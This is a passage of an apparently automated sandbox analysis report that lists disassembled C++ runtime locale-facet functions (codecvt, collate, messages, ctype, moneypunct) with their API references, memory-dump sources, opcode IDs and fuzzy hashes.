                                                                                                                                                                                                                                                  • Instruction ID: 62cd35d2af9d8fcc505e281b31c14597def64ee5e1ec76cc257d88074e9e2c9d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a27a86e3a5144d13edc9973fa1a62885075704da6d2b1f8ad42b43c3f96a4bb3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4901C031900619DBCB05EB64DC41ABEBBB0AF80720F250519F914AB3D2DF7C9E05AB91
                                                                                                                                                                                                                                                  Function 00F4238F Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F42396
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F423A0
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • codecvt.LIBCPMT ref: 00F423DA
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F423F1
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42411
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 712880209-0
                                                                                                                                                                                                                                                  • Opcode ID: 60399aa4ede025215fd9d03295115a201834976d42152d336d78de5ffbb85f50
                                                                                                                                                                                                                                                  • Instruction ID: 57ce6552136268a3d491f827611622f7b8a2138c9748beaac85eba20b44209cf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60399aa4ede025215fd9d03295115a201834976d42152d336d78de5ffbb85f50
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF01C031900219DBCB05EB649C416BE7BB1BF80720F240419F9106B2D2CFBC9E05EB91
                                                                                                                                                                                                                                                  Function 00F424B9 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F424C0
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F424CA
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • collate.LIBCPMT ref: 00F42504
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F4251B
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4253B
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1007100420-0
                                                                                                                                                                                                                                                  • Opcode ID: 59f2c9dce089709517fc5843e30aa9d91e972ee1d4fa9bce7ee4db396fd29099
                                                                                                                                                                                                                                                  • Instruction ID: a7b81481d332c681f47a52e0567b898596eb4934324653fbd4de54ca63b071c0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59f2c9dce089709517fc5843e30aa9d91e972ee1d4fa9bce7ee4db396fd29099
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C701D231900619DBCB05EB64DC456BE7B60AF84730F250419F910AB3D2CF789E05BB91
                                                                                                                                                                                                                                                  Function 00F42424 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F4242B
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F42435
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • collate.LIBCPMT ref: 00F4246F
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F42486
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F424A6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1007100420-0
                                                                                                                                                                                                                                                  • Opcode ID: 59a340c1da3e8d3556afecc62b59908d5e09e0577dbbb01d7274f29a6ee3b561
                                                                                                                                                                                                                                                  • Instruction ID: 7132f5c97c606bb244e5e9858aa27dfb9e73738f185fedd0a99bb2c089e9414c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59a340c1da3e8d3556afecc62b59908d5e09e0577dbbb01d7274f29a6ee3b561
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13018031900619DBCB05EB64DC416BEBF61AF84730F250419F9146B3D2DF789E05EB91
                                                                                                                                                                                                                                                  Function 00F425E3 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F425EA
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F425F4
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • messages.LIBCPMT ref: 00F4262E
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F42645
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42665
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2750803064-0
                                                                                                                                                                                                                                                  • Opcode ID: 0d46b8e6adfc85ad8c1c42537ab3cef6fa2d66a1782dbfe158294973c67aefba
                                                                                                                                                                                                                                                  • Instruction ID: be96df7534fdcd8a7e0bfb0caf2f093d962d7e09ce5b93f291acaed534f545ee
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d46b8e6adfc85ad8c1c42537ab3cef6fa2d66a1782dbfe158294973c67aefba
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D701CC31900219DBCB05FB649C51ABE7BA0BF80760F254419F910AB3D2CF789E01EB91
                                                                                                                                                                                                                                                  Function 00F4254E Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F42555
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F4255F
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • ctype.LIBCPMT ref: 00F42599
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F425B0
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F425D0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 83828444-0
                                                                                                                                                                                                                                                  • Opcode ID: 87ba56ff98927c68e8fff656774dcee4362844064d50ded4d42426e04a173b03
                                                                                                                                                                                                                                                  • Instruction ID: 2cdcea3b5a7e975673b5cb798c51c75b653d07012a5ee140a503374c63e7d5cf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87ba56ff98927c68e8fff656774dcee4362844064d50ded4d42426e04a173b03
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB010032800219DBCB00EB64CC41ABE7B70AF84320F280419F910AB2D2DF789E05FB91
                                                                                                                                                                                                                                                  Function 00F3D6BD Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F3D6C4
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F3D6CE
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • codecvt.LIBCPMT ref: 00F3D708
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F3D71F
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3D73F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 712880209-0
                                                                                                                                                                                                                                                  • Opcode ID: 5f87fc3a4a6ddf2d5a3316ec87a3fddd45b3530befbb5103fc66b4806ca616d1
                                                                                                                                                                                                                                                  • Instruction ID: 360615233922cea01aa10b4ec6bf242756ccb5a8321d3f35ba88475999d20ddc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f87fc3a4a6ddf2d5a3316ec87a3fddd45b3530befbb5103fc66b4806ca616d1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D019E35900619DBCB15FB64EC41ABE7BB1BF84730F250909F914AB2D2CF789E05AB91
                                                                                                                                                                                                                                                  Function 00F42678 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F4267F
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F42689
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • messages.LIBCPMT ref: 00F426C3
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F426DA
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F426FA
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2750803064-0
                                                                                                                                                                                                                                                  • Opcode ID: 6db0bfbb12c82b7c20b93c57e6df71a3bd6bbc8400b51fe9a50af610b25041fb
                                                                                                                                                                                                                                                  • Instruction ID: 1f06e821dc248e3c11f7a7fa2646ab66b5a2c108001eb6143e31461e823eb404
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6db0bfbb12c82b7c20b93c57e6df71a3bd6bbc8400b51fe9a50af610b25041fb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8701C031900619DFCB05FB64CC41ABE7B60AF84720F254459F910AB2D2DF789E05BB91
                                                                                                                                                                                                                                                  Function 00F4E8D8 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F4E8DF
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F4E8E9
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • messages.LIBCPMT ref: 00F4E923
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F4E93A
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4E95A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2750803064-0
                                                                                                                                                                                                                                                  • Opcode ID: b7e9d97f8df1a78ef247cfa857ea181e1f833efa937f6eb0ca90a9757d4d3689
                                                                                                                                                                                                                                                  • Instruction ID: dfa706a8e1db87256e0b0976a30cd41c4509a8f88bf6616b9c363387b7360433
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b7e9d97f8df1a78ef247cfa857ea181e1f833efa937f6eb0ca90a9757d4d3689
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3019232900619DFCB05EB64DC45ABE7BA1BF84720F250549F914AB3D2CF789E05EB91
                                                                                                                                                                                                                                                  Function 00F4E843 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F4E84A
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F4E854
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • collate.LIBCPMT ref: 00F4E88E
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F4E8A5
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4E8C5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1007100420-0
                                                                                                                                                                                                                                                  • Opcode ID: 0a1363b2f647e6ad0563c44271dc30627de41ab01c1c28bfe5699dda676bb79f
                                                                                                                                                                                                                                                  • Instruction ID: f49a8e6202a865fc72228f7b903ef61f051d3802e79267395cc716cb00c1841d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a1363b2f647e6ad0563c44271dc30627de41ab01c1c28bfe5699dda676bb79f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65018036900619DFCB05FB649C41ABE7BB1BF84720F244409F914AB2D2DF789E05AB91
                                                                                                                                                                                                                                                  Function 00F429F6 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F429FD
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F42A07
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • moneypunct.LIBCPMT ref: 00F42A41
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F42A58
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42A78
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 419941038-0
                                                                                                                                                                                                                                                  • Opcode ID: b4bfa00f9b75752fd066a7383acd79acdccb639f2a7aedb8337a41436faceb93
                                                                                                                                                                                                                                                  • Instruction ID: 9221d27173f021c500df3549786e5f7e8097008234ce23dbca46ad121f0cf331
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4bfa00f9b75752fd066a7383acd79acdccb639f2a7aedb8337a41436faceb93
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E701DE31900229DBCB15EF64CC41ABE7BA1AF84760F250419FD10AB2D2CF7C9E06AB91
                                                                                                                                                                                                                                                  Function 00F42961 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F42968
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F42972
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • moneypunct.LIBCPMT ref: 00F429AC
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F429C3
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F429E3
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 419941038-0
                                                                                                                                                                                                                                                  • Opcode ID: 38b473b293f0a1e5079636c7748f537a01530b71456fb1af62c08acac2922792
                                                                                                                                                                                                                                                  • Instruction ID: 52a00d07e30ed0c8e20e179b87849d418ee17c12e2df70e341de320cda09da71
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38b473b293f0a1e5079636c7748f537a01530b71456fb1af62c08acac2922792
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF01DE31900619DBCB05FB64CC42ABE7BB0AF84760F250519FE10AB2D2DF789E01BB91
                                                                                                                                                                                                                                                  Function 00F4EA97 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
